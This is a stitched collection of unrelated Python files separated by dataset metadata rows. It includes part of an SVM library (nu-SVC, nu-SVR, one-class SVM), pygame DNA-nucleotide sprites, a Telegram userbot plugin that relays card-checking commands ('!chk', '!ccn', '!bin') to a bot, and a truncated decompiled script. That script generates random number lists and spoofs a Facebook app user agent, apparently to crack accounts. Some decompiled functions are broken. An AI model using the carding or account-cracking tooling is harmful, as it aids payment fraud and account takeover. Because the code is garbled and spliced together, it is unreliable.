Degree of the polynomial kernel, default 3;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; 'scale' means 1 / (n_features * X.var()) and 'auto' means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function. It is only used by "poly" and "sigmoid";
max_iter : int, default=1000
Number of SMO iterations, default 1000;
rff : bool, default=False
Whether to use random Fourier features, default False;
D : int, default=1000
Number of random Fourier feature samples, default 1000;
tol : float, default=1e-5
Tolerance of the SMO algorithm, default 1e-5;
cache_size : int, default=256
LRU cache size, default 256; if 0 no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(1, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
self.nu = nu
def fit(self, X: np.ndarray, y: np.ndarray):
X, y = np.array(X), np.array(y, dtype=float)
y[y != 1] = -1
l, self.n_features = X.shape
p = np.zeros(l)
kernel_func = self.register_kernel(X.std())
def func(i):
return y * kernel_func(X, X[i:i + 1]).reshape(-1) * y[i]
if self.cache_size == 0:
Q = y.reshape(-1, 1) * y * kernel_func(X, X)
solver = NuSolver(Q, p, y, self.nu * l, self.C, self.tol)
else:
solver = NuSolverWithCache(p, y, self.nu * l, self.C, func,
self.tol, self.cache_size)
for n_iter in range(self.max_iter):
i, j, Qi, Qj = solver.working_set_select(func)
if i < 0:
break
solver.update(i, j, Qi, Qj)
else:
print("NuSVC not coverage with {} iterations".format(
self.max_iter))
rho, b = solver.calculate_rho_b()
self.decision_function = lambda x: np.matmul(
solver.alpha * y,
kernel_func(X, x),
) / rho + b / rho
return self
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
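# Usage sketch (illustrative only, not part of the original module): binary
# nu-SVM. nu replaces C and, roughly, upper-bounds the fraction of margin
# errors while lower-bounding the fraction of support vectors. scikit-learn is
# assumed only for the toy dataset; the function name is hypothetical.
def _demo_bi_nu_svc():
    from sklearn.datasets import make_blobs
    X, y = make_blobs(n_samples=100, centers=2, random_state=0)
    clf = BiNuSVC(nu=0.3, kernel='rbf')
    clf.fit(X, y)  # labels other than 1 are mapped to -1 internally
    print("decision values:", clf.decision_function(X)[:5])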
class NuSVC(KernelSVC, BiNuSVC):
r'''Multi-class NuSVM.
Parameters
----------
nu : float, default=0.5
Parameter of NuSVM that controls the number of support vectors;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
Degree of the polynomial kernel, default 3;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; 'scale' means 1 / (n_features * X.var()) and 'auto' means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function. It is only used by "poly" and "sigmoid";
max_iter : int, default=1000
Number of SMO iterations, default 1000;
rff : bool, default=False
Whether to use random Fourier features, default False;
D : int, default=1000
Number of random Fourier feature samples, default 1000;
tol : float, default=1e-5
Tolerance of the SMO algorithm, default 1e-5;
cache_size : int, default=256
LRU cache size, default 256; if 0 no cache is used and the full Q matrix is computed before solving.
multiclass : {"ovr", "ovo"}, default="ovr"
Multi-class strategy, ovr (one-vs-rest) or ovo (one-vs-one), default ovr;
n_jobs : int, default=None
Number of CPUs used for parallel fitting; by default no parallelism is used.
'''
def __init__(self,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256,
multiclass: str = "ovr",
n_jobs: int = None) -> None:
super().__init__(1, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size, multiclass, n_jobs)
self.nu = nu
params = {
"estimator":
BiNuSVC(nu, kernel, degree, gamma, coef0, max_iter, rff, D, tol,
cache_size),
"n_jobs":
n_jobs,
}
self.multiclass_model: OneVsOneClassifier = {
"ovo": OneVsOneClassifier(**params),
"ovr": OneVsRestClassifier(**params),
}[multiclass]
def fit(self, X: np.ndarray, y: np.ndarray):
return super().fit(X, y)
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
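# Usage sketch (illustrative only, not part of the original module): the
# multiclass strategy is picked in the constructor. "ovr" fits one binary NuSVC
# per class, "ovo" one per class pair; "ovo" trains more models but each one on
# a smaller subset of the data. scikit-learn is assumed for the toy dataset.
def _demo_nu_svc_multiclass():
    from sklearn.datasets import make_blobs
    X, y = make_blobs(n_samples=150, centers=3, random_state=0)
    for strategy in ("ovr", "ovo"):
        clf = NuSVC(nu=0.3, multiclass=strategy)
        clf.fit(X, y)
        print(strategy, "train accuracy:", (clf.predict(X) == y).mean())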
class NuSVR(KernelSVR):
r'''NuSVM regression.
It solves the dual problem
.. math:: \min_{\pmb{\alpha},\pmb{\alpha}^*}\quad&\dfrac12(\pmb{\alpha}-\pmb{\alpha}^*)^\top Q(\pmb{\alpha}-\pmb{\alpha}^*)+\pmb z^\top({\pmb\alpha}-{\pmb\alpha}^*)\\
\text{s.t.}\quad&\pmb e^\top(\pmb{\alpha}-\pmb{\alpha}^*)=0,\pmb e^\top(\pmb\alpha+\pmb\alpha^*)\leqslant C\nu\\
&0\leqslant\alpha_i,\alpha^*_i\leqslant C/l,i=1,\cdots ,l
The handling is similar to that in LinearSVR.
Parameters
----------
C : float, default=1
Regularization parameter of the SVM, default 1;
nu : float, default=0.5
Parameter of NuSVM that controls the number of support vectors;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
Degree of the polynomial kernel, default 3;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; 'scale' means 1 / (n_features * X.var()) and 'auto' means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function. It is only used by "poly" and "sigmoid";
max_iter : int, default=1000
Number of SMO iterations, default 1000;
rff : bool, default=False
Whether to use random Fourier features, default False;
D : int, default=1000
Number of random Fourier feature samples, default 1000;
tol : float, default=1e-5
Tolerance of the SMO algorithm, default 1e-5;
cache_size : int, default=256
LRU cache size, default 256; if 0 no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
C: float = 1.,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(C, 0, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
self.nu = nu
def fit(self, X: np.ndarray, y: np.ndarray):
X, z = np.array(X), np.array(y)
l, self.n_features = X.shape
y = np.empty(2 * l)
y[:l], y[l:] = 1, -1
p = np.empty(2 * l)
p[:l], p[l:] = -z, z
kernel_func = self.register_kernel(X.std())
def func(i):
if i < l:
Qi = kernel_func(X, X[i:i + 1]).reshape(-1)
else:
Qi = -kernel_func(X, X[i - l:i - l + 1]).reshape(-1)
return np.hstack((Qi, -Qi))
if self.cache_size == 0:
Q = kernel_func(X, X)
Q2 = np.hstack((Q, -Q))
Q4 = np.vstack((Q2, -Q2))
solver = NuSolver(Q4, p, y, self.C * l * self.nu, self.C, self.tol)
else:
solver = NuSolverWithCache(p, y, self.C * l * self.nu, self.C,
func, self.tol, self.cache_size)
for n_iter in range(self.max_iter):
i, j, Qi, Qj = solver.working_set_select(func)
if i < 0:
break
solver.update(i, j, Qi, Qj)
else:
print("NuSVR not coverage with {} iterations".format(
self.max_iter))
rho, b = solver.calculate_rho_b()
self.decision_function = lambda x: np.matmul(
solver.alpha[:l] - solver.alpha[l:],
kernel_func(X, x),
) + b
return self
def predict(self, X: np.ndarray):
return super().predict(X)
def score(self, X: np.ndarray, y: np.ndarray):
return super().score(X, y)
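# Usage sketch (illustrative only, not part of the original module): unlike
# KernelSVR there is no explicit eps parameter here; the tube width is adjusted
# by the optimizer so that roughly a nu-fraction of the training points end up
# outside the tube. Only numpy is assumed; the function name is hypothetical.
def _demo_nu_svr():
    rng = np.random.RandomState(0)
    X = np.linspace(0, 6, 150).reshape(-1, 1)
    y = np.sin(X).ravel() + 0.1 * rng.randn(150)
    reg = NuSVR(C=10., nu=0.5, kernel='rbf')
    reg.fit(X, y)
    print("train R^2:", reg.score(X, y))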
class OneClassSVM(BiNuSVC):
r'''OneClassSVM (OC_SVM), a one-class SVM used for anomaly detection.
It solves the dual problem
.. math:: \min_{\pmb\alpha}\quad&\dfrac{1}{2}\pmb\alpha^\top Q\pmb\alpha\\
\text{s.t.}\quad&0\le\alpha_i\le1/(\nu l),i=1,\cdots l\\
&\pmb e^\top\pmb\alpha=1
and obtains the decision rule
.. math:: f(\pmb x)=\text{sgn}(\sum_{i=1}^ly_i\alpha_i\pmb K(\pmb x_i,\pmb x)-\rho)
Parameters
----------
nu : float, default=0.5
Parameter that controls the number of support vectors;
kernel : {"linear", "poly", "rbf", "sigmoid"}, default="rbf"
Kernel function, the radial basis function (RBF) by default;
degree : float, default=3
Degree of the polynomial kernel, default 3;
gamma : {"scale", "auto", float}, default="scale"
Parameter :math:`\gamma` of the rbf, poly and sigmoid kernels; 'scale' means 1 / (n_features * X.var()) and 'auto' means 1 / n_features;
coef0 : float, default=0.
Independent term of the kernel function. It is only used by "poly" and "sigmoid";
max_iter : int, default=1000
Number of SMO iterations, default 1000;
rff : bool, default=False
Whether to use random Fourier features, default False;
D : int, default=1000
Number of random Fourier feature samples, default 1000;
tol : float, default=1e-5
Tolerance of the SMO algorithm, default 1e-5;
cache_size : int, default=256
LRU cache size, default 256; if 0 no cache is used and the full Q matrix is computed before solving.
'''
def __init__(self,
nu: float = 0.5,
kernel: str = 'rbf',
degree: float = 3,
gamma: float = 'scale',
coef0: float = 0.,
max_iter: int = 1000,
rff: bool = False,
D: int = 1000,
tol: float = 1e-5,
cache_size: int = 256) -> None:
super().__init__(nu, kernel, degree, gamma, coef0, max_iter, rff, D,
tol, cache_size)
def fit(self, X: np.ndarray):
'''Training function. Note that OC_SVM is unsupervised, so no labels are passed in.
Parameters
----------
X : np.ndarray
Training feature data
'''
X = np.array(X)
l, self.n_features = X.shape
kernel_func = self.register_kernel(X.std())
p = np.zeros(l)
y = np.ones(l)
def func(i):
return kernel_func(X, X[i:i + 1]).reshape(-1)
# init: libsvm-style one-class initialization, so that sum(alpha) == nu * l
alpha = np.ones(l)
n = int(self.nu * l)
for i in range(n):
alpha[i] = 1
if n < l:
alpha[n] = self.nu * l - n
for i in range(n + 1, l):
alpha[i] = 0
if self.cache_size == 0:
Q = kernel_func(X, X)
solver = Solver(Q, p, y, 1, self.tol)
solver.alpha = alpha
solver.neg_y_grad = -y * np.matmul(Q, solver.alpha)
else:
solver = SolverWithCache(p, y, 1, self.tol, self.cache_size)
solver.alpha = alpha
for i in range(l):
solver.neg_y_grad[i] -= y[i] * np.matmul(func(i), solver.alpha)
for n_iter in range(self.max_iter):
i, j = solver.working_set_select()
if i < 0:
break
solver.update(i, j, func)
else:
print("OneClassSVM not coverage with {} iterations".format(
self.max_iter))
rho = solver.calculate_rho()
self.decision_function = lambda x: np.matmul(
solver.alpha,
kernel_func(X, x),
) - rho
return self
def predict(self, X: np.ndarray):
'''Classify whether each sample is anomalous: 1 for normal, -1 for anomalous.'''
pred = np.sign(self.decision_function(X))
pred[pred == 0] = -1
return pred
def score(self, X, y):
'''An unsupervised problem has no score function, so calling this raises an exception.'''
raise NotImplementedError
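# Usage sketch (illustrative only, not part of the original module): one-class
# SVM for outlier detection. fit() is unsupervised; predict() returns +1 for
# inliers and -1 for outliers, and nu roughly upper-bounds the fraction of
# training points treated as outliers. Only numpy is assumed.
def _demo_one_class_svm():
    rng = np.random.RandomState(0)
    X_train = 0.3 * rng.randn(200, 2)                  # tight inlier cloud
    X_test = np.vstack([0.3 * rng.randn(20, 2),        # more inliers
                        rng.uniform(-4, 4, (20, 2))])  # scattered outliers
    oc = OneClassSVM(nu=0.1, kernel='rbf')
    oc.fit(X_train)
    print(oc.predict(X_test))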
| 31.321238
| 216
| 0.511858
| 3,687
| 29,348
| 3.97559
| 0.074586
| 0.035612
| 0.025242
| 0.031519
| 0.849434
| 0.833129
| 0.819075
| 0.802906
| 0.784145
| 0.771115
| 0
| 0.032403
| 0.341727
| 29,348
| 936
| 217
| 31.354701
| 0.726332
| 0.300395
| 0
| 0.738431
| 0
| 0
| 0.022938
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.104628
| false
| 0
| 0.012072
| 0.042254
| 0.219316
| 0.014085
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
3b5d1255f3db95024131da5f5742cbae6d2fb11a
| 78
|
py
|
Python
|
python/stitch/frameworks/tune/__init__.py
|
theNewFlesh/sparse
|
21e895d2e24cc17e92fe921534059046080cc58b
|
[
"MIT"
] | 2
|
2020-04-17T04:26:23.000Z
|
2021-12-27T17:24:08.000Z
|
python/stitch/frameworks/tune/__init__.py
|
theNewFlesh/stitch
|
21e895d2e24cc17e92fe921534059046080cc58b
|
[
"MIT"
] | null | null | null |
python/stitch/frameworks/tune/__init__.py
|
theNewFlesh/stitch
|
21e895d2e24cc17e92fe921534059046080cc58b
|
[
"MIT"
] | null | null | null |
import stitch.frameworks.tune.tuner
import stitch.frameworks.tune.config_path
| 26
| 41
| 0.871795
| 11
| 78
| 6.090909
| 0.636364
| 0.358209
| 0.656716
| 0.776119
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.051282
| 78
| 2
| 42
| 39
| 0.905405
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 0
| 0
|
0
| 7
|
3b79b586c3e357dfed9bc7ec561f04de9e569586
| 4,454
|
py
|
Python
|
ATH/nucleicAcid.py
|
james-darpino/Game_Design1
|
7b07c27b976a8193561d38d7da17e583a166e0c0
|
[
"MIT"
] | null | null | null |
ATH/nucleicAcid.py
|
james-darpino/Game_Design1
|
7b07c27b976a8193561d38d7da17e583a166e0c0
|
[
"MIT"
] | null | null | null |
ATH/nucleicAcid.py
|
james-darpino/Game_Design1
|
7b07c27b976a8193561d38d7da17e583a166e0c0
|
[
"MIT"
] | null | null | null |
import pygame
import random
import Globals
class Adenine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("adenine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
class Cytosine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("cytosine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
class Guanine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("Guanine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
class Thymine(pygame.sprite.Sprite):
""" This class represents an Adenine which the player must collect. """
def __init__(self):
""" Constructor, create the image of the Adenine. """
super().__init__()
self.image = pygame.Surface([Globals.ION_WIDTH, Globals.ION_HEIGHT])
self.rect = self.image.get_rect()
self.image = pygame.image.load("thymine.png").convert_alpha()
self.image = pygame.transform.scale(self.image, (Globals.ION_WIDTH, Globals.ION_HEIGHT))
def draw(self, screen):
""" Maps the image to the rectangle. """
screen.blit(self.image, self.rect)
def reset_pos(self):
""" Shows the range and boundaries of where the ion should be placed. """
self.rect.y = random.randrange(-300, -20)
self.rect.x = random.uniform(Globals.HELIX_LEFT_BOUNDARY, Globals.HELIX_RIGHT_BOUNDARY)
def update(self):
""" Automatically called when we need to move the ion. """
self.rect.y += 5
if self.rect.y > Globals.SCREEN_HEIGHT + self.rect.height:
self.reset_pos()
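# Illustrative sketch (not part of the original file): the four nucleotide
# sprites are typically driven through a pygame sprite Group, whose update()
# call fans out to every sprite's update() each frame. The helper name and the
# default count are assumptions, not part of the game code above.
def _spawn_nucleotides(count=10):
    group = pygame.sprite.Group()
    for _ in range(count):
        ion = random.choice([Adenine, Cytosine, Guanine, Thymine])()
        ion.reset_pos()
        group.add(ion)
    return group  # in the game loop: group.update(), then draw each sprite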
| 38.068376
| 96
| 0.647283
| 590
| 4,454
| 4.744068
| 0.123729
| 0.080029
| 0.064309
| 0.06288
| 0.964273
| 0.964273
| 0.964273
| 0.964273
| 0.964273
| 0.964273
| 0
| 0.006979
| 0.227885
| 4,454
| 116
| 97
| 38.396552
| 0.806921
| 0.237539
| 0
| 0.835821
| 0
| 0
| 0.013749
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.238806
| false
| 0
| 0.044776
| 0
| 0.343284
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
8e9758dab0b96fe58f164d814a58e08e4cd51b66
| 8,442
|
py
|
Python
|
userbot/plugins/binchecker.py
|
karmaboii/Karmabot
|
f7007daee7d7dfb57ecc9ae26dd09f75c7aaf3b5
|
[
"MIT"
] | null | null | null |
userbot/plugins/binchecker.py
|
karmaboii/Karmabot
|
f7007daee7d7dfb57ecc9ae26dd09f75c7aaf3b5
|
[
"MIT"
] | null | null | null |
userbot/plugins/binchecker.py
|
karmaboii/Karmabot
|
f7007daee7d7dfb57ecc9ae26dd09f75c7aaf3b5
|
[
"MIT"
] | null | null | null |
# © KarmaBot
# Created by @Karmaboii
import datetime
import asyncio
from telethon import events
from telethon.errors.rpcerrorlist import YouBlockedUserError, UserAlreadyParticipantError
from telethon.tl.functions.account import UpdateNotifySettingsRequest
from telethon.tl.functions.messages import ImportChatInviteRequest
from userbot.utils import admin_cmd
import time
from userbot import ALIVE_NAME
naam = str(ALIVE_NAME)
bot = "@uNiqueko_bot"
@borg.on(admin_cmd("bin ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!bin")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!bin " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("chk ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!chk")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!chk " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("pp ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!pp")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!pp " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("ccn ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!ccn")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!ccn " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("csk ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!csk")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!csk " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
@borg.on(admin_cmd("cid ?(.*)"))
async def _(event):
if event.fwd_from:
return
sysarg = event.pattern_match.group(1)
if sysarg == "":
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!cid")
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
elif "" in sysarg:
async with borg.conversation(bot) as conv:
try:
await conv.send_message("/start")
response = await conv.get_response()
await conv.send_message("!cid " + sysarg)
audio = await conv.get_response()
final = ("If you get any problem Contact to Creator of this plugin @Karmaboii")
await borg.send_message(event.chat_id, audio.text)
await event.delete()
except YouBlockedUserError:
await event.edit("**Error:** `unblock` @KarmaHacx_bot `and retry!")
| 42.636364
| 95
| 0.59429
| 972
| 8,442
| 5.047325
| 0.088477
| 0.088055
| 0.063596
| 0.097839
| 0.916429
| 0.916429
| 0.916429
| 0.916429
| 0.916429
| 0.916429
| 0
| 0.001017
| 0.300877
| 8,442
| 197
| 96
| 42.852792
| 0.830058
| 0.003791
| 0
| 0.843243
| 0
| 0
| 0.185322
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.048649
| 0
| 0.081081
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
8edccc557fbaa4ed787958477c2924c39a0369b2
| 14,222
|
py
|
Python
|
Indo/indo_dec.py
|
shyamjangid07/Reverse-Engineering
|
469efabcd6057f7895d8d891f1fabdf2ffe730b0
|
[
"Apache-2.0"
] | 337
|
2020-08-15T12:22:14.000Z
|
2022-03-29T06:05:15.000Z
|
Indo/indo_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 3
|
2020-11-12T14:30:48.000Z
|
2021-05-18T16:56:22.000Z
|
Indo/indo_dec.py
|
ajairakaam/Reverse-Engineering
|
49d00bafd0622ffb79e081946a19c5fd3a42628f
|
[
"Apache-2.0"
] | 83
|
2020-08-15T00:22:58.000Z
|
2022-03-31T08:40:23.000Z
|
# Decompiled by HTR-TECH | TAHMID RAYAT
# Github : https://github.com/htr-tech
#---------------------------------------
# Auto Dis Parser 2.2.0
# Source File : indo_1.pyc
# Bytecode Version : 2.7
# Embedded file name: <tegarid>
# Time : Sun Aug 9 11:45:04 2020
#---------------------------------------
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, getpass
os.system('rm -rf .txt')
for n in range(10000):
nmbr = random.randint(1111111, 9999999)
sys.stdout = open('.txt', 'a')
print nmbr
sys.stdout.flush()
try:
import requests
except ImportError:
os.system('pip2 install mechanize')
try:
import mechanize
except ImportError:
os.system('pip2 install request')
time.sleep(1)
os.system('Then type: python2 boss')
import os, sys, time, datetime, random, hashlib, re, threading, json, urllib, cookielib, requests, mechanize
from multiprocessing.pool import ThreadPool
from requests.exceptions import ConnectionError
from mechanize import Browser
reload(sys)
sys.setdefaultencoding('utf8')
br = mechanize.Browser()
br.set_handle_robots(False)
br.set_handle_refresh(mechanize._http.HTTPRefreshProcessor(), max_time=1)
br.addheaders = [('User-Agent', 'Opera/9.80 (Android; Opera Mini/32.0.2254/85. U; id) Presto/2.12.423 Version/12.16')]
br.addheaders = [('user-agent', 'Dalvik/1.6.0 (Linux; U; Android 4.4.2; NX55 Build/KOT5506) [FBAN/FB4A;FBAV/106.0.0.26.68;FBBV/45904160;FBDM/{density=3.0,width=1080,height=1920};FBLC/it_IT;FBRV/45904160;FBCR/PosteMobile;FBMF/asus;FBBD/asus;FBPN/com.facebook.katana;FBDV/ASUS_Z00AD;FBSV/5.0;FBOP/1;FBCA/x86:armeabi-v7a;]')]
def keluar():
print 'Thanks.'
os.sys.exit()
def acak(b):
w = 'ahtdzjc'
d = ''
for i in x:
d += '!' + w[random.randint(0, len(w) - 1)] + i
return cetak(d)
def cetak(b):
w = 'ahtdzjc'
for i in w:
j = w.index(i)
x = x.replace('!%s' % i, '\x1b[%s;1m' % str(31 + j))
x += '\x1b[0m'
x = x.replace('!0', '\x1b[0m')
sys.stdout.write(x + '\n')
def jalan(z):
for e in z + '\n':
sys.stdout.write(e)
sys.stdout.flush()
time.sleep(0.001)
def tik():
titik = [
